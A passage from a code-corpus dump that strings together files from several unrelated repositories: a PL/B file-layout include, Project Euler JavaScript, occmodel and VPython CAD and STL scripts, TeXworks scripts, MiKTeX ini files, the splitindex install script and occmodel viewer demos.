.*******************************************************************************
.* LENGTH: 18
.*
.* ACCESS: ISI
.* KEY : 1-6 NCRCKEY
.* key 2 7-14 date
.*revisions
.*07Apr98 DLH add second key by date,CHANGE LAYOUT, ADD LOCK OPTIONS
.* year 2000 compliance.
.. Patch 1.2 Changed IP address of File Manager DMB 18JUN04
.. Patch 1.1 Added file to File Manager ASH 07AUG01
.***********************
.
NCRCFILE IFILE KEYLEN=6,FIXED=18 *DUPLICATES ALLOWED.
ncrcfle2 Ifile keylen=8,fixed=18
.NCRCFILE IFILE KEYLEN=12,FIXED=16 *DUPLICATES ALLOWED.
NCRCFLAG FORM 1
.START PATCH 1.1 REPLACED LOGIC
.NCRCNAME INIT "NINORD3 "
.NCRCNME2 INIT "NINORD3A"
.Patch 1.2 Begin
.NCRCNAME INIT "NINORD3.ISI|20.20.30.103:502 "
NCRCNAME INIT "NINORD3.ISI|NINS1:502 "
.NCRCNME2 INIT "NINORD3A.ISI|20.20.30.103:502"
NCRCNME2 INIT "NINORD3A.ISI|NINS1:502"
.Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
NCRCFLG2 FORM 1
.NCRCFLD DIM 12
NCRCFLD DIM 6
ncrcfld2 dim 8
ncrcpath form 1
NCRCLOCK FORM 1 0,1 = FILEPI, 2=RECORD LOCK, 3=NO LOCK
ncrcvars list
NCRCKEY DIM 6 1-6 ORDER LR NUMBER key1
ncrccc dim 2 7-8 Century of revision \
NCRCYY DIM 2 9-10 DATE OF REVISION \
NCRCMM DIM 2 11-12 DATE OF REVISION >key 2
NCRCDD DIM 2 13-14 DATE OF REVISION /
NCRCCODE DIM 1 15-15 STATUS 'R'=REVISED 'C'=CANCELLED.
NCRCTYP DIM 3 16-18 WHO REVISED.
listend
.
.pre 07apr98
............
.NCRCKEY DIM 6 1-6 ORDER LR NUMBER.
.NCRCCODE DIM 1 7-7 STATUS 'R'=REVISED 'C'=CANCELLED.
.NCRCMM DIM 2 8-9 DATE OF REVISION.
.NCRCDD DIM 2 10-11 DATE OF REVISION.
.NCRCYY DIM 2 12-13 DATE OF REVISION.
.NCRCTYP DIM 3 14-16 WHO REVISED.
.
| e4a80e5438d27667ac97aeb76eed4f7a112beb29 | [
"SQL",
"HTML",
"INI",
"PHP",
"C++"
] | 186 | PHP | wobbly/NINCAL | 0204eef37953568419732b2a83f9dacdd19e9db4 | c126a9c55a846efb0a2b68cb2224bdb9921bb36d |
HEAD | <file_sep># js-project_euler
<file_sep>var isPrime = function(input){
for(var i = 2; i < input; i++){
if(input % i === 0){
return false;
}
}
return true;
};
// Returns the largest prime factor of `input` (number or numeric string),
// e.g. 13195 -> 29; a prime input is its own largest prime factor.
// Rewritten to factor by repeated division, O(sqrt(n)): the original
// scanned divisors downward from input-1 and primality-tested each one,
// which is far too slow for Project Euler sized inputs (600851475143).
// Degenerate inputs (non-numeric, or n < 2) are returned unchanged,
// mirroring the original's fall-through behaviour.
var maxPrimeFactor = function(input){
    var n = Number(input);
    if(!isFinite(n) || n < 2){
        return input;
    }
    var largest = 1;
    for(var factor = 2; factor * factor <= n; factor++){
        while(n % factor === 0){
            largest = factor;
            n = n / factor;
        }
    }
    if(n > 1){
        largest = n;    // the remaining cofactor is itself prime
    }
    return largest;
}
// Live UI binding: recompute the largest prime factor on every keystroke.
var numberInput3 = document.querySelector("[name=inputNumber3]");
var resultArea3 = document.querySelector(".max-prime-factor");
numberInput3.addEventListener('input', function() {
    var val = maxPrimeFactor(this.value);   // this.value is always a string
    resultArea3.textContent = val;
});<file_sep>var evenFibonacciNumbers = function(num){
var sum = 0;
var sequence = [];
sequence[0] = sequence[1] = 1;
sequence[2] = 2;
while(sequence[2] <= num){
sequence[2] = sequence[0] + sequence[1];
if(sequence[2] % 2 === 0 && sequence[2] <= num){
sum += sequence[2];
}
sequence[0] = sequence[1];
sequence[1] = sequence[2];
}
return sum;
};
// Live UI binding: recompute the even-Fibonacci sum on every keystroke.
var numberInput2 = document.querySelector("[name=inputNumber2]");
var resultArea2 = document.querySelector(".even-fibonacci-numbers");
numberInput2.addEventListener('input', function() {
    var val = evenFibonacciNumbers(this.value);   // this.value is a string
    resultArea2.textContent = val;
}); | e7cb2d2bbbea609d0f87c3a993dcdd755f370511 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | EGiataganas/js-project_euler | 4c5458c50d09be6fd60982f3cb2a4a1397b8964c | dfd6af9423c1d2398f6f9eb62df9a33d9ed038e5 |
refs/heads/master | <file_sep>from occmodelviewer import viewer
from occmodel import *
solid = Solid()
solid.createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
print(solid.centreOfMass())
view = viewer(interactive = True)
view.add(solid)
view.redraw()
#viewer(solid)
#viewer((solid,face,edge))<file_sep>// TeXworksScript
// Title: Title Case
// Description: Converts the Current Selection to Title Case
// Author: <NAME>
// Version: 0.1
// Date: 2009-09-07
// Script-Type: standalone
// Context: TeXDocument
/* To Title Case 1.1.1
* <NAME> <http://individed.com>
* 23 May 2008
*
* Copyright (c) 2008 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
/* MODIFIED by <NAME> for use with TeXworks: added optional leading
backslash to the word-finding regex, to protect TeX control words */
// Converts the string to title case (David Gouch's "To Title Case" 1.1.1,
// with the TeXworks addition of an optional leading backslash so TeX
// control words are matched as single words).
// Encoding fix: the word-matching character class had been mojibake'd --
// MacRoman typographic quotes re-read as Latin-1 yielded `ÔÕ`/`Ò`; the
// intended characters ‘ ’ “ are restored so words containing curly quotes
// (e.g. "isn’t") are matched whole again instead of being split.
String.prototype.toTitleCase = function() {
  return this.replace(/(\\?[\w&`'‘’"“.@:\/\{\(\[<>_]+-? *)/g, function(match, p1, index, title) {
    // Lowercase small words (a, an, the, of, ...) unless they start the
    // string or immediately follow a subtitle colon.
    if (index > 0 && title.charAt(index - 2) !== ":" &&
      match.search(/^(a(nd?|s|t)?|b(ut|y)|en|for|i[fn]|o[fnr]|t(he|o)|vs?\.?|via)[ \-]/i) > -1)
      return match.toLowerCase();
    // Word opens with a quote/bracket character: capitalise its second char.
    if (title.substring(index - 1, index + 1).search(/['"_{(\[]/) > -1)
      return match.charAt(0) + match.charAt(1).toUpperCase() + match.substr(2);
    // Leave intact: words with inner capitals, '&', dotted/underscored
    // compounds (file.names, snake_case), or words after a closing bracket.
    if (match.substr(1).search(/[A-Z]+|&|[\w]+[._][\w]+/) > -1 ||
      title.substring(index - 1, index + 1).search(/[\])}]/) > -1)
      return match;
    // Default: capitalise the first character.
    return match.charAt(0).toUpperCase() + match.substr(1);
  });
};
// thanks to <NAME>'s function, the actual TW script is trivial:
// TeXworks driver: `target` is the global the editor injects; only source
// editor windows ("TeXDocument") expose a text selection to rewrite.
if (target.objectName == "TeXDocument") {
  var txt = target.selection;
  if (txt != "") {
    var pos = target.selectionStart;
    txt = txt.toTitleCase();
    // insertText replaces the current selection with the converted text
    target.insertText(txt);
    // re-select the converted span so the user sees what changed
    target.selectRange(pos, txt.length);
  }
} else {
  // Bare string expression left as the script's final value -- presumably
  // surfaced by TeXworks as the script result message (confirm in the
  // TeXworks scripting docs).
  "This script only works in source document windows."
}
<file_sep>#coding: utf-8
# 使用 occmodel 模組, 間接擷取 Open CASCADE 函式庫
from occmodel import *
from occmodelviewer import *
from visual import scene, color, materials, faces, points
import os, struct
# 建立三個 circles, 然後 loft 成實體, 印出體積後
# 最後再轉成 loft.stp STEP 檔案
第一個圓 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.2)
第二個圓 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
第三個圓 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((第一個圓,第二個圓,第三個圓), True)
print (solid.volume())
# 特別注意轉出 loft.stp 的用法
Tools.writeSTEP(bytes('loft.stp'.encode("utf-8")),solid)
# 轉成 ASCII STL
Tools.writeSTL(bytes('loft.stl'.encode("utf-8")),solid)
file ="loft.stl"
scene.width = 400
scene.height = 400
scene.background = color.white # black
# 視窗標題取自 cvisual.pyd, 不可使用中文
scene.title = "STLViewer in VPython"
print ("利用滑鼠右鍵旋轉")
print ("滑鼠左右鍵同時按下後移動, 可以縮放畫面")
# Read STL file, only use vertex-line with xyz coordinates
list = []
#load stl file detects if the file is a text file or binary file
def load_stl(filename):
    """Load an STL file, dispatching on its header.

    ASCII STL files begin with the bytes ``b'solid'``; anything else is
    treated as binary.  Vertices end up in the module-level ``list``
    via whichever helper gets called.
    """
    # Peek at the first bytes of the (up to) 80-byte header.
    with open(filename, 'rb') as fp:
        magic = fp.read(80)[0:5]
    if magic == b'solid':
        print("讀取文字檔案格式:" + str(filename))
        load_text_stl(filename)
    else:
        print("讀取二位元檔案格式:" + str(filename))
        load_binary_stl(filename)
#load binary stl file check wikipedia for the binary layout of the file
#we use the struct library to read in and convert binary data into a format we can use
def load_binary_stl(filename):
    """Read a binary STL file, appending its vertices to the global
    ``list`` (three ``[x, y, z]`` float lists per triangle; the facet
    normal and the per-facet attribute word are discarded).

    Binary STL layout (little-endian per the STL specification):
        UINT8[80]  header (must not start with b'solid')
        UINT32     number of triangles
        per triangle (50 bytes total):
            REAL32[3] normal, REAL32[3] v1, REAL32[3] v2, REAL32[3] v3
            UINT16    attribute byte count
    """
    global list
    with open(filename, 'rb') as fp:
        fp.read(80)  # skip the header
        (triangle_number,) = struct.unpack('<I', fp.read(4))
        # Read each 50-byte facet record whole.  This replaces the
        # original open-ended `while True` loop, which (a) iterated one
        # extra time past the last triangle (`count > triangle_number`
        # off-by-one), (b) relied on an EOFError that file.read() never
        # raises, and (c) used native instead of little-endian unpacking.
        for _ in range(triangle_number):
            record = fp.read(50)
            if len(record) < 50:
                break  # truncated file: stop rather than append garbage
            # 12 little-endian floats: normal (ignored) + three vertices.
            values = struct.unpack('<12f', record[:48])
            for i in (3, 6, 9):
                list.append([values[i], values[i + 1], values[i + 2]])
def load_text_stl(filename):
    """Parse an ASCII STL file, appending every ``vertex x y z`` line
    to the global ``list`` as a ``[x, y, z]`` list of floats."""
    global list
    with open(filename, "r") as fp:
        for raw in fp:
            fields = raw.split()
            # Blank lines split to [], so the truthiness check skips them.
            if fields and fields[0] == "vertex":
                list.append([float(v) for v in fields[1:4]])
# Load the STL written above (path resolved against the working directory).
load_stl(os.path.abspath('')+'/'+file)
# Graphics
model = faces(pos=list, color=(0.8,0.8,0.8),
    material=materials.plastic) # creates triangles
# Note: the per-facet normals stored in the STL file are ignored; VPython's
# make_normals() recomputes plane normals from the vertex list instead.
model.make_normals() # creates plane normals
model.smooth(0.93) # smooths the edges
# = AllepunkteSTL points (pos = list, size = 3, color = Color.Black) # generates points
<file_sep>;;; DO NOT EDIT THIS FILE!
!include context.ini
;;;
@712132ae9c989e81a4dcd09d110e43d9
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.text]
path=.
path;=%R/dvipdfm//
[ft.map]
path=.
;; <legacy>
path;=%R/dvipdfm//
path;=%R/dvips//
;; </legacy>
path;=%R/fonts/map//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.PostScript header]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/dvipdfm//
path;=%R/dvips//
;; </legacy>
<file_sep>Download Files
==========
https://github.com/downloads/tpaviot/oce/OCE-0.10.0-Win-MSVC2008.zip<file_sep>// TeXworksScript
// Title: LaTeX errors
// Description: Looks for errors in the LaTeX terminal output
// Author: <NAME>
// Version: 0.1
// Date: 2009-06-14
// Script-Type: hook
// Hook: AfterTypeset
// This is just a simple proof-of-concept; it will often get filenames wrong, for example.
// Switching the engines to use the FILE:LINE-style error messages could help a lot.
// Regular expressions used to walk the TeX console log.
parenRE = new RegExp("[()]");                  // parens mark file open/close
newFileRE = new RegExp("^\\(([\\./][^ )]+)");  // "(./file" opens an input file
lineNumRE = new RegExp("^l\\.(\\d+)");         // "l.<n>" follows an error
badLineRE = new RegExp("^(?:Over|Under)full \\\\hbox.*at lines (\\d+)");
result = [];
// get the text from the standard console output
txt = target.consoleOutput;
lines = txt.split('\n');
curFile = undefined;   // best guess at the file TeX is currently reading
filenames = [];        // stack of enclosing input files
extraParens = 0;       // "(" seen that did not open a file; matched before pops
for (i = 0; i < lines.length; ++i) {
    line = lines[i];
    // check for error messages ("! ...")
    if (line.match("^! ")) {
        var error = [];
        // record the current input file
        error[0] = curFile;
        // record the error message itself
        error[2] = line;
        // look ahead for the "l.<num>" line and record the number
        error[1] = 0;
        while (++i < lines.length) {
            line = lines[i];
            matched = lineNumRE.exec(line);
            if (matched) {
                error[1] = matched[1];
                break;
            }
        }
        result.push(error);
        continue;
    }
    // check for over- or underfull lines
    matched = badLineRE.exec(line);
    if (matched) {
        var error = [];
        error[0] = curFile;
        error[1] = matched[1];
        error[2] = line;
        result.push(error);
        continue;
    }
    // try to track beginning/ending of input files (flaky!)
    pos = line.search(parenRE);
    while (pos >= 0) {
        line = line.slice(pos);
        if (line.charAt(0) == ")") {
            // ")" closes either a bare paren or the current input file
            if (extraParens > 0) {
                --extraParens;
            }
            else if (filenames.length > 0) {
                curFile = filenames.pop();
            }
            line = line.slice(1);
        }
        else {
            match = newFileRE.exec(line);
            if (match) {
                // "(<path>": descend into a new input file
                filenames.push(curFile);
                curFile = match[1];
                line = line.slice(match[0].length);
                extraParens = 0;
            }
            else {
                // "(" that is not a file open: remember it so the
                // matching ")" gets ignored
                ++extraParens;
                line = line.slice(1);
            }
        }
        if (line == undefined) {
            // NOTE(review): slice() always returns a string, so this
            // guard looks unreachable -- kept as in the original.
            break;
        }
        pos = line.search(parenRE);
    }
}
// finally, return our result, or 'undefined' if nothing was found
if (result.length == 0) {
    result = undefined;
}
result;
<file_sep>;;; DO NOT EDIT THIS FILE!
[cont-cz.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Czech ConTeXt (pdfTeX)
input=cont-cz.ini
name=cont-cz
[cont-cz.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Czech ConTeXt (XeTeX)
input=cont-cz.ini
name=cont-cz
[cont-de.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=German ConTeXt (pdfTeX)
input=cont-de.ini
name=cont-de
[cont-de.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=German ConTeXt (XeTeX)
input=cont-de.ini
name=cont-de
[cont-en.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=English ConTeXt (pdfTeX)
input=cont-en.ini
name=cont-en
[cont-en.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=English ConTeXt (XeTeX)
input=cont-en.ini
name=cont-en
#[cont-es.pdftex]
#
#arguments=-enable-8bit-chars
#attributes=exclude
#compiler=pdftex
#description=Spanish ConTeXt (pdfTeX)
#input=cont-es.ini
#name=cont-es
#[cont-es.xetex]
#
#arguments=-enable-8bit-chars
#attributes=exclude
#compiler=xetex
#description=Spanish ConTeXt (XeTeX)
#input=cont-es.ini
#name=cont-es
[cont-fr.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=French ConTeXt (pdfTeX)
input=cont-fr.ini
name=cont-fr
[cont-fr.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=French ConTeXt (XeTeX)
input=cont-fr.ini
name=cont-fr
[cont-it.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Italian ConTeXt (pdfTeX)
input=cont-it.ini
name=cont-it
[cont-it.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Italian ConTeXt (XeTeX)
input=cont-it.ini
name=cont-it
[cont-nl.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Dutch ConTeXt (pdfTeX)
input=cont-nl.ini
name=cont-nl
[cont-nl.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Dutch ConTeXt (XeTeX)
input=cont-nl.ini
name=cont-nl
[cont-ro.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=Romanian ConTeXt (pdfTeX)
input=cont-ro.ini
name=cont-ro
[cont-ro.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=Romanian ConTeXt (XeTeX)
input=cont-ro.ini
name=cont-ro
[cont-uk.pdftex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=pdftex
description=UK English ConTeXt (pdfTeX)
input=cont-uk.ini
name=cont-uk
[cont-uk.xetex]
arguments=-enable-8bit-chars
attributes=exclude
compiler=xetex
description=UK English ConTeXt (XeTeX)
input=cont-uk.ini
name=cont-uk
<file_sep>;;; MiKTeX startup information
[Paths]
;; user TEXMF root directories
;;UserRoots=..\..\..\texmf-local
;;UserInstall=..\..\..\texmf-local
UserData=..\..\..\texmf-local
UserConfig=..\..\..\texmf-local
[Auto]
Config=Portable
<file_sep>#!/bin/sh
# Option defaults.
archbin=false      # install per-architecture binaries under $bindir
tdsarchive=false   # lay files out for a TDS zip archive

# Parse the command line.
while [ $# -gt 0 ]; do
  case $1 in
    --prefix)
      if [ $# -lt 2 ]; then
        echo "$0: argument expected after --prefix" >&2
        exit 1
      else
        prefix=$2
        shift 2
      fi
      ;;
    --prefix=*)
      prefix=${1#--prefix=}
      shift 1
      ;;
    --archbin)
      archbin=true
      shift 1
      ;;
    --tdsarchive)
      tdsarchive=true
      shift 1
      ;;
    --bindir)
      if [ $# -lt 2 ]; then
        echo "$0: argument expected after --bindir" >&2
        exit 1
      else
        bindir=$2
        shift 2
      fi
      ;;
    --bindir=*)
      bindir=${1#--bindir=}
      shift 1
      ;;
    --mandir)
      if [ $# -lt 2 ]; then
        echo "$0: argument expected after --mandir" >&2
        exit 1
      else
        mandir=$2
        shift 2
      fi
      ;;
    --mandir=*)
      mandir=${1#--mandir=}
      shift 1
      ;;
    --texmf)
      if [ $# -lt 2 ]; then
        echo "$0: argument expected after --texmf" >&2
        exit 1
      else
        texmf=$2
        shift 2
      fi
      ;;
    --texmf=*)
      texmf=${1#--texmf=}
      shift 1
      ;;
    --version|-v)
      echo "install.sh v0.1"
      echo "Copyright (c) <NAME> 2002"
      exit 0
      ;;
    --help|-h)
      echo "Usage: install.sh [OPTIONS]"
      echo
      echo "Installs SplitIndex for all unix like environments."
      echo
      echo "OPTIONS:"
      echo "--prefix=<DIR> install binaries at <DIR>/bin and manuals at <DIR>/man"
      echo " (default: /usr/local)"
      echo "--bindir=<DIR> install binaries at <DIR>"
      echo "--archbin install binaries at arch depending directories at bindir"
      echo "--mandir=<DIR> install manuals at <DIR>"
      echo "--texmf=<DIR> install packages and TeX programs at <DIR>/tex/latex/splitindex,"
      echo " documentation (dvi and pdf) at <DIR>/doc/latex/splitindex and"
      echo " sources at <DIR>/source/latex/splitindex"
      echo " (default: \$TEXMFLOCAL if you are root and \$HOMETEXMF if"
      echo " you are not root)"
      exit 0
      ;;
    --dist)
      # Maintainer target: build release tarball, TDS zip, and CTAN zip.
      mkdir -p splitidx
      cp -L splitindex splitindex-Linux-i386
      cp -L splitindex.tex splitindex.pl splitindex.c splitindex.java \
        splitindex.class splitindex.exe splitidx.dtx splitidx.ins \
        splitindex-Linux-i386 splitindex-OpenBSD-i386 \
        splitindex.1 install.txt manifest.txt install.sh \
        README splitidx
      tar jcvf splitidx-`date +%F`.tar.bz2 splitidx
      cd splitidx
      rm -r chroot
      ./install.sh --texmf ../chroot/texmf --tdsarchive
      cd ..
      rm -r splitidx
      cd chroot/texmf
      zip -r ../../splitindex-`date +%F`.tds.zip *
      cd ../..
      find chroot/texmf/ | \
        sed 's/chroot\//+-/g;s/[a-z0-9-]*\//-/g'
      mkdir chroot/splitindex
      cp -R -p -L chroot/texmf/source/latex/splitindex/* chroot/splitindex
      cp -R -p -L chroot/texmf/doc/latex/splitindex/* chroot/splitindex
      cd chroot
      zip -r ../splitindex-`date +%F`.CTAN.zip splitindex
      cd ..
      rm -r chroot
      exit 0
      ;;
    *)
      # Fix: the user-facing message previously read "unkown option".
      echo "unknown option \`$1'" >&2
      echo "Try \`./install.sh --help' for more information." >&2
      exit 1
      ;;
  esac
done
# Pick (or build) a splitindex binary matching the host platform.
case `uname -s -m` in
  OpenBSD*i?86*)
    cp -pf splitindex-OpenBSD-i386 splitindex
    splitindex=splitindex
    ;;
  Linux*i?86*)
    cp -pf splitindex-Linux-i386 splitindex
    splitindex=splitindex
    ;;
  CYGWIN*i?86*)
    splitindex=splitindex.exe
    ;;
  *)
    # Unknown platform: try the shipped binary, else compile from source
    # (first with, then without long-option support).
    if ! ./splitindex -V; then
      echo 'Os '`uname -s -m`' not supported!'
      echo 'Trying to compile the source:'
      gcc -O3 -Wall -o splitindex splitindex.c || \
      gcc -O3 -Wall -DNO_LONGOPT -o splitindex splitindex.c || \
      echo 'You have to compile splitindex.c by your own!'
    fi
    # Keep a copy named after this platform if the build works.
    if ./splitindex -V; then
      splitindex=splitindex
      cp -p splitindex splitindex-`uname -s`-`uname -m`
    fi
    ;;
esac
# Fill in defaults for any paths not supplied on the command line.
if [ -z "$prefix" ]; then
  prefix=/usr/local
fi
if [ -z "$bindir" ]; then
  bindir=$prefix/bin
fi
if [ -z "$mandir" ]; then
  mandir=$prefix/man
fi
if [ -z "$texmf" ]; then
  # root installs into the site tree, regular users into their home tree
  if [ "r$USER" = "rroot" ]; then
    texmf=`kpsexpand '$TEXMFLOCAL'`
  else
    texmf=`kpsexpand '$HOMETEXMF'`
  fi
  if [ -z "$texmf" ]; then
    # Fix: the variable names must be escaped inside double quotes;
    # previously $TEXMFLOCAL/$HOMETEXMF expanded (usually to nothing),
    # so the message showed "kpsexpand ''" instead of the literal names.
    echo "kpsexpand '\$TEXMFLOCAL' or kpsexpand '\$HOMETEXMF' failed!" >&2
    echo "You have to use option --texmf=<DIR>." >&2
    echo "This error is fatal!" >&2
    exit 1
  fi
fi
# Generate the package and its documentation: repeated (pdf)latex runs
# resolve cross-references; mkindex builds the package's own index.
latex splitidx.ins
latex splitidx.dtx
latex splitidx.dtx
mkindex splitidx
latex splitidx.dtx
pdflatex splitidx.dtx
pdflatex splitidx.dtx
mkindex splitidx
pdflatex splitidx.dtx
# Create the target texmf directory tree.
install -v -m 755 -d $texmf/doc/latex/splitindex
install -v -m 755 -d $texmf/tex/latex/splitindex
install -v -m 755 -d $texmf/source/latex/splitindex
if $tdsarchive; then
  # TDS layout: the perl script goes under scripts/splitindex/perl.
  install -v -m 755 -d $texmf/scripts/splitindex/perl
  install -v -m 755 splitindex.pl $texmf/scripts/splitindex/perl
  install -v -m 644 splitindex.1 $texmf/doc/latex/splitindex
elif $archbin; then
  # Per-architecture binary subdirectories under $bindir.
  install -v -m 755 -d $bindir
  install -v -m 755 -d $bindir/i386-linux
  install -v -m 755 -d $bindir/i386-openbsd
  install -v -m 755 -d $bindir/i386-cygwin
  install -v -m 755 -d $bindir/any
  install -v -m 755 splitindex-Linux-i386 $bindir/i386-linux/splitindex
  install -v -m 755 splitindex-OpenBSD-i386 $bindir/i386-openbsd/splitindex
  install -v -m 755 splitindex.exe $bindir/i386-cygwin/splitindex.exe
  install -v -m 755 splitindex.pl $bindir/any
  install -v -m 644 splitindex.class $bindir/any
  install -v -m 755 -d $mandir/man1
  install -v -m 644 splitindex.1 $mandir/man1
else
  # Flat single-directory install of the platform binary chosen above.
  install -v -m 755 -d $bindir
  install -v -m 755 $splitindex splitindex.pl $bindir
  install -v -m 644 splitindex.class $bindir
fi
# Package files, documentation, and sources into the texmf tree.
install -v -m 644 splitindex.tex splitidx.sty $texmf/tex/latex/splitindex
install -v -m 644 README install.txt splitidx.pdf $texmf/doc/latex/splitindex
install -v -m 644 \
  splitindex.1 splitindex.c splitindex.java splitindex.class \
  splitindex.tex\
  README splitidx.dtx splitidx.ins manifest.txt install.txt \
  $texmf/source/latex/splitindex
install -v -m 755 \
  install.sh \
  splitindex.pl splitindex.exe \
  splitindex-Linux-i386 splitindex-OpenBSD-i386 \
  $texmf/source/latex/splitindex
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.dvipsconfig]
path=.
path;=%R/dvips//
[ft.enc]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.map]
path=.
path;=%R/fonts/map//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.PostScript header]
path=.
path;=%R/dvips//
path;=%R/fonts/afm//
path;=%R/fonts/enc//
path;=%R/fonts/map//
path;=%R/fonts/type1//
path;=$(psfontdirs)
;;;
@4fd007fcdbb496fc6764fbdfd1b2e60c
<file_sep>Your Simple Groupware
===============
http://www.simple-groupware.de/cms/<file_sep>#!c:\Python33\python.exe
# -*- coding: utf-8 -*-
import math
import geotools as geo
import gltools as gl
import occmodel as occ
from occmodelviewer import Viewer
class Demo:
    """Base class for the viewer demos.

    Subclasses provide ``NAME``, a ``TEXT`` string of occmodel example
    code, and ``results(loc)`` which lays out the objects that TEXT
    created for display.
    """

    @classmethod
    def eval(self):
        """Execute ``self.TEXT`` and return the laid-out shapes.

        The namespace handed to exec() exposes ``pi`` and the occmodel
        primitives that the demo snippets reference.
        """
        loc = {
            'pi':math.pi,
            'Vertex':occ.Vertex,
            'Edge':occ.Edge,
            'Wire':occ.Wire,
            'Face':occ.Face,
            'Solid':occ.Solid,
            'SWEEP_RIGHT_CORNER': occ.SWEEP_RIGHT_CORNER,
        }
        # Bug fix: the original `exec(self.TEXT) in loc` is leftover
        # Python 2 syntax.  Under Python 3 (the shebang targets
        # Python 3.3) it parses as `(exec(self.TEXT)) in loc`, so TEXT
        # ran in *this* frame's namespace and the demo objects never
        # landed in `loc`, breaking the results(loc) lookups below.
        exec(self.TEXT, loc)
        return self.results(loc)
class Edge_1(Demo):
    """Edge primitive demos: lines, circles, arcs, helix and splines."""
    NAME = "Primitives"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
e1 = Edge().createLine(start = (0.,0.,0.), end = (1.,1.,0.))
e2 = Edge().createCircle(center = (0.,.5,0.), normal = (0.,0.,1.), radius = .5)
e3 = Edge().createArc(start = (-.5,0.,0.), end = (.5,1.,0.), center = (.5,0.,0.))
e4 = Edge().createArc3P(start = (1.,0.,0.), end = (-1.,0.,0.), pnt = (0.,1.,0.))
e5 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .5, rMinor=.2)
e6 = Edge().createHelix(pitch = .5, height = 1., radius = .25, angle = pi/5.)
pnts = ((0.,0.,0.), (0.,1.,0.), (1.,.5,0.), (1.,0.,0.))
e7 = Edge().createBezier(points = pnts)
pnts = ((0.,0.,0.), (0.,.5,0.), (1.,.25,0.),(1.,0.,0.))
e8 = Edge().createSpline(points = pnts)
"""

    @classmethod
    def results(self, loc):
        """Arrange the edges in two rows of four, 1.5 units apart."""
        shown = []
        for row_y, keys in ((2., ('e1', 'e2', 'e3', 'e4')),
                            (0., ('e5', 'e6', 'e7', 'e8'))):
            for slot, key in enumerate(keys):
                shape = loc[key]
                shape.translate((slot * 1.5, row_y, 0))
                shown.append(shape)
        return shown
class Wire_1(Demo):
    """Wire primitive demos: rectangles, polygon and regular polygon."""
    NAME = "Primitives"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
w1 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2 = Wire().createRectangle(width = 1., height = 0.75, radius = .25)
w3 = Wire().createPolygon((
(-.5,-.5,0.),
(.5,-.5,0.),
(0.,.5,0.)),
close = True,
)
w4 = Wire().createRegularPolygon(radius = .5, sides = 6.)
"""

    @classmethod
    def results(self, loc):
        """Lay the four wires out along the x axis, 1.5 units apart."""
        shown = []
        for slot, key in enumerate(('w1', 'w2', 'w3', 'w4')):
            shape = loc[key]
            shape.translate((slot * 1.5, 0., 0))
            shown.append(shape)
        return shown
class Wire_2(Demo):
    """Wire operation demos: offset, fillet, chamfer, cut and common."""
    NAME = "Operations"
    # Source executed by Demo.eval(); also shown in the UI source panel.
    TEXT = """
# offset wire
w1 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2.offset(0.1)
# fillet all edges
w3 = Wire().createRegularPolygon(radius = .5, sides = 6.)
w3.fillet(0.2)
# chamfer all edges
w4 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w4.chamfer(0.15)
# wire boolean cut operation
w5 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e1 = Edge().createCircle(center=(-.5,-.5,0.),normal=(0.,0.,1.),radius = .35)
e2 = Edge().createEllipse(center=(.5,.5,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.35)
w5.cut((e1,e2))
